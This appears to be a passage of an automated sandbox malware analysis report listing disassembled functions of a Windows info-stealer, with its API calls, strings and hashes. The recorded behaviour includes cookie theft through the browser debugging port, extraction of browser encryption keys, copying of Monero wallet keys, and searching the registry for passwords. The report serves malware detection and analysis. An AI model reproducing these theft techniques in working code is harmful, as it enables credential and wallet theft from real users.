                                    • lstrcat.KERNEL32(?,?), ref: 00689CFB
                                    • lstrcat.KERNEL32(?,.txt), ref: 00689D0D
                                    • lstrlen.KERNEL32(00000000), ref: 00689D17
                                    • lstrlen.KERNEL32(00000000), ref: 00689D26
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                    • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                    • API String ID: 3174675846-3542011879
                                    • Opcode ID: 1fbbe61d876fb385bdbb3dc57311813507057cf216be5031fdbb79b21dfe40a2
                                    • Instruction ID: 75040a731876749b1b1168ca3d2381776d517f5075f36c38255398d5c1483333
                                    • Opcode Fuzzy Hash: 1fbbe61d876fb385bdbb3dc57311813507057cf216be5031fdbb79b21dfe40a2
                                    • Instruction Fuzzy Hash: 7E514CB1914608ABCB14FBE0EC95FEEB739AF45301F404658F206A7191EB70AB49CF65
                                    Function 00695510 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                      • Part of subcall function 006862D0: InternetOpenA.WININET(006A0DFF,00000001,00000000,00000000,00000000), ref: 00686331
                                      • Part of subcall function 006862D0: StrCmpCA.SHLWAPI(?,0142E2C0), ref: 00686353
                                      • Part of subcall function 006862D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00686385
                                      • Part of subcall function 006862D0: HttpOpenRequestA.WININET(00000000,GET,?,0142D6B0,00000000,00000000,00400100,00000000), ref: 006863D5
                                      • Part of subcall function 006862D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0068640F
                                      • Part of subcall function 006862D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00686421
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00695568
                                    • lstrlen.KERNEL32(00000000), ref: 0069557F
                                      • Part of subcall function 00698FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698FE2
                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 006955B4
                                    • lstrlen.KERNEL32(00000000), ref: 006955D3
                                    • lstrlen.KERNEL32(00000000), ref: 006955FE
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 3240024479-1526165396
                                    • Opcode ID: 72b3dd9cd95fbe04af507d552c116443c3bb277753d5cd55b681b5470ab9c815
                                    • Instruction ID: 1adb8f981ec2b15f1c99c09d4baf5f1bdddf4f4669459059dde78e1ce55de9ea
                                    • Opcode Fuzzy Hash: 72b3dd9cd95fbe04af507d552c116443c3bb277753d5cd55b681b5470ab9c815
                                    • Instruction Fuzzy Hash: 7651E870914108ABCF54FFA0C9A6AFD77BEAF11341F504458E40A5B992EB306B05CBAA
                                    Function 00691520 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: 9ba5dd94368efc23a571453f626136f6a40e9dbaaefe0f3303eb6877c06427c6
                                    • Instruction ID: 53fef5fb72c96845099990bcfd98176d94dde0773298e20f0fca17df5d6150fa
                                    • Opcode Fuzzy Hash: 9ba5dd94368efc23a571453f626136f6a40e9dbaaefe0f3303eb6877c06427c6
                                    • Instruction Fuzzy Hash: E2C1B3B59002099BCF54EFA0DC99FEE73BEAF54304F10459CF409A7641EA70AA85CFA4
                                    Function 006944D0 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00698F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 0069453C
                                    • lstrcat.KERNEL32(?,0142DD70), ref: 0069455B
                                    • lstrcat.KERNEL32(?,?), ref: 0069456F
                                    • lstrcat.KERNEL32(?,0142C9E8), ref: 00694583
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 00698F20: GetFileAttributesA.KERNEL32(00000000,?,00681B94,?,?,006A577C,?,?,006A0E22), ref: 00698F2F
                                      • Part of subcall function 0068A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0068A489
                                      • Part of subcall function 0068A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0068A13C
                                      • Part of subcall function 0068A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0068A161
                                      • Part of subcall function 0068A110: LocalAlloc.KERNEL32(00000040,?), ref: 0068A181
                                      • Part of subcall function 0068A110: ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 0068A1AA
                                      • Part of subcall function 0068A110: LocalFree.KERNEL32(0068148F), ref: 0068A1E0
                                      • Part of subcall function 0068A110: CloseHandle.KERNEL32(000000FF), ref: 0068A1EA
                                      • Part of subcall function 00699550: GlobalAlloc.KERNEL32(00000000,0069462D,0069462D), ref: 00699563
                                    • StrStrA.SHLWAPI(?,0142DD40), ref: 00694643
                                    • GlobalFree.KERNEL32(?), ref: 00694762
                                      • Part of subcall function 0068A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Oh,00000000,00000000), ref: 0068A23F
                                      • Part of subcall function 0068A210: LocalAlloc.KERNEL32(00000040,?,?,?,00684F3E,00000000,?), ref: 0068A251
                                      • Part of subcall function 0068A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Oh,00000000,00000000), ref: 0068A27A
                                      • Part of subcall function 0068A210: LocalFree.KERNEL32(?,?,?,?,00684F3E,00000000,?), ref: 0068A28F
                                    • lstrcat.KERNEL32(?,00000000), ref: 006946F3
                                    • StrCmpCA.SHLWAPI(?,006A08D2), ref: 00694710
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00694722
                                    • lstrcat.KERNEL32(00000000,?), ref: 00694735
                                    • lstrcat.KERNEL32(00000000,006A0FA0), ref: 00694744
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                    • String ID:
                                    • API String ID: 3541710228-0
                                    • Opcode ID: ece25692d762247b13c92f4e92506959b6ef39cfe174a2267aedc7b71676ac17
                                    • Instruction ID: 71ea57dcbda34aaf769035af0362ee1ff2645a4ddc60f24f73285c4878557408
                                    • Opcode Fuzzy Hash: ece25692d762247b13c92f4e92506959b6ef39cfe174a2267aedc7b71676ac17
                                    • Instruction Fuzzy Hash: D17164B6910208ABDF54EBE0ED85FEE737EAB89300F004598F60597581EA34EB45CB95
                                    Function 00681310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 006812A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006812B4
                                      • Part of subcall function 006812A0: RtlAllocateHeap.NTDLL(00000000), ref: 006812BB
                                      • Part of subcall function 006812A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006812D7
                                      • Part of subcall function 006812A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006812F5
                                      • Part of subcall function 006812A0: RegCloseKey.ADVAPI32(?), ref: 006812FF
                                    • lstrcat.KERNEL32(?,00000000), ref: 0068134F
                                    • lstrlen.KERNEL32(?), ref: 0068135C
                                    • lstrcat.KERNEL32(?,.keys), ref: 00681377
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                      • Part of subcall function 00698CF0: GetSystemTime.KERNEL32(006A0E1B,0142E6D0,006A05B6,?,?,006813F9,?,0000001A,006A0E1B,00000000,?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 00698D16
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00681465
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                      • Part of subcall function 0068A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0068A13C
                                      • Part of subcall function 0068A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0068A161
                                      • Part of subcall function 0068A110: LocalAlloc.KERNEL32(00000040,?), ref: 0068A181
                                      • Part of subcall function 0068A110: ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 0068A1AA
                                      • Part of subcall function 0068A110: LocalFree.KERNEL32(0068148F), ref: 0068A1E0
                                      • Part of subcall function 0068A110: CloseHandle.KERNEL32(000000FF), ref: 0068A1EA
                                    • DeleteFileA.KERNEL32(00000000), ref: 006814EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                    • API String ID: 3478931302-218353709
                                    • Opcode ID: 6b0d1ec78fcd34e63f0501ebf14d6ee1988c9d35645d7a633fc59562db2c5470
                                    • Instruction ID: b3c0a8cd558b75a5afac68000333f930aaf264860186e9b7a2c03fd7c26d3df8
                                    • Opcode Fuzzy Hash: 6b0d1ec78fcd34e63f0501ebf14d6ee1988c9d35645d7a633fc59562db2c5470
                                    • Instruction Fuzzy Hash: 225153B19101189BCF54FBA0DCA2EED737E9F54300F4045DCB20A62491EE306B89CFAA
                                    Function 00689A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetOpenA.WININET(006A0AF6,00000001,00000000,00000000,00000000), ref: 00689A6A
                                    • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00689AAB
                                    • InternetCloseHandle.WININET(00000000), ref: 00689AC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$Open$CloseHandle
                                    • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                    • API String ID: 3289985339-2144369209
                                    • Opcode ID: 1e33ba38474ae106a59ec0f3695a890632994d676f8ca0f147569e6a9fd3c5ed
                                    • Instruction ID: 308af9cb17b29e7cebc15d46117360e264594d429a0a205b91bc6f29c27ef3b2
                                    • Opcode Fuzzy Hash: 1e33ba38474ae106a59ec0f3695a890632994d676f8ca0f147569e6a9fd3c5ed
                                    • Instruction Fuzzy Hash: CB412B35A14258EFDB14EFA4DC95FEDB77AAB48740F104198F509AB190CBB0AE84CF64
                                    Function 00687630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00687330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0068739A
                                      • Part of subcall function 00687330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00687411
                                      • Part of subcall function 00687330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0068746D
                                      • Part of subcall function 00687330: GetProcessHeap.KERNEL32(00000000,?), ref: 006874B2
                                      • Part of subcall function 00687330: HeapFree.KERNEL32(00000000), ref: 006874B9
                                    • lstrcat.KERNEL32(00000000,006A192C), ref: 00687666
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 006876A8
                                    • lstrcat.KERNEL32(00000000, : ), ref: 006876BA
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 006876EF
                                    • lstrcat.KERNEL32(00000000,006A1934), ref: 00687700
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00687733
                                    • lstrcat.KERNEL32(00000000,006A1938), ref: 0068774D
                                    • task.LIBCPMTD ref: 0068775B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                    • String ID: :
                                    • API String ID: 2677904052-3653984579
                                    • Opcode ID: 1b04623143a5db47ebf180c5f7554225e9016ee118c50f26e136621c41b2c1ea
                                    • Instruction ID: 2d21df75394409b4ca189b536258d0ac8bbb68d0b93c30524227d9b01ce0a459
                                    • Opcode Fuzzy Hash: 1b04623143a5db47ebf180c5f7554225e9016ee118c50f26e136621c41b2c1ea
                                    • Instruction Fuzzy Hash: 0E315071918205EFDB04EBF0ED95DFFB37AAB44302F504208F116672A0DE34AA46DB94
                                    Function 00698290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0142DB00,00000000,?,006A0E14,00000000,?,00000000), ref: 006982C0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 006982C7
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 006982E8
                                    • __aulldiv.LIBCMT ref: 00698302
                                    • __aulldiv.LIBCMT ref: 00698310
                                    • wsprintfA.USER32 ref: 0069833C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB$@
                                    • API String ID: 2774356765-3474575989
